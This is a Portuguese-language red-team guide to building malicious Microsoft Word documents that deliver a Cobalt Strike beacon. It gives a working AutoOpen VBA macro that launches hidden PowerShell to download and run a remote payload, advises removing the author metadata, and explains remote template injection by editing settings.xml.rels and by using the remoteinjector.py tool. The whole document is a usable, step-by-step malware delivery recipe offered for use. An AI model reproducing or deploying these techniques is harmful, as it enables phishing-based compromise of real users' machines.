# Beacon - Microsoft Word

### Arquivo Doc (Word 2003+)

Abra CS Client, vá no Menu `Attacks` > `Scripted Web Delivery (S)` e defina a URI que desejar, selecione o Listener (pode ser o HTTP), deixe o tipo como `powershell` e a flag marcada em `User x64 payload`. Irá ser exibido um popup com um comando, copie este comando e guarde em algum lugar.

Agora abra o Word, gere uma nova Macro no botão que localizado no menu `View` > `Macro`. Na janela que abrir, defina o nome da macro como `AutoOpen`, vá em `Macros in`, selecion `Document1` e depois clique em `Create`. Feito isso, deixe a macro somente com o script abaixo. Note que na penúltima linha é preciso alterar para o comando que foi gerado no CS. Presta atenção nas aspas duplas.

```bash
Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://<ip>/<uri>'))"""
End Sub
```

Agora salve o arquivo com formato `.doc` e lembre-se de remover o `Author`

### Arquivo Dot + Dotx (Word Templates)

Crie um arquivo semelhante ao .doc anterior, porém salve-o com o nome `template.dot`. Abra o CS, vá no Menu `Site Management` > `Host File`, na janela que abrir, selecione o arquivo que acabou de criar (template.dot), em `Local URI` insira `/template.dot` e clique em launcher. No popup, copie o endereço que aparecer. No explorer do Windows, vá em `Documents\Custom Office Templates` e abra um template. Geralmente vem o `Blank Template.dotx`, então abra-o e salve com a extensão .docx no mesmo diretório do arquivo template.dot. Vá no local onde salvou o arquivo .docx, clique com o botão direito do mouse no arquivo e vá em `7-Zip` > `Open archive`. Navegue então até o arquivo `word\_rels\settings.xml.rels`, clique com o botão direito e clique em `edit`. No final do arquivo, irá ter uma chava `Target`, que aponta para o template que utilizamos (Documents\Custom Office Templates\Blank Template.dotx), então vamos alterar para o caminho remoto que copiamos no popup do CS.

**OBS.:** Sempre que disponibilizar arquivos vie web, como por exemplo ao usarmos o `Site Management > Host File`, habilite o log no Menu `View` > `Web Log`.

#### RemoteInjector.py

Para automatizar o que feito acima, podemos utilizar esse tool através do seguinte comando:

```bash
python3 remoteinjector.py -w <caminho-remoto-gerado-cobaltstrike>
```

### Sites

```bash
# RemoteInjector.py
https://github.com/JohnWoodman/remoteInjector.git
```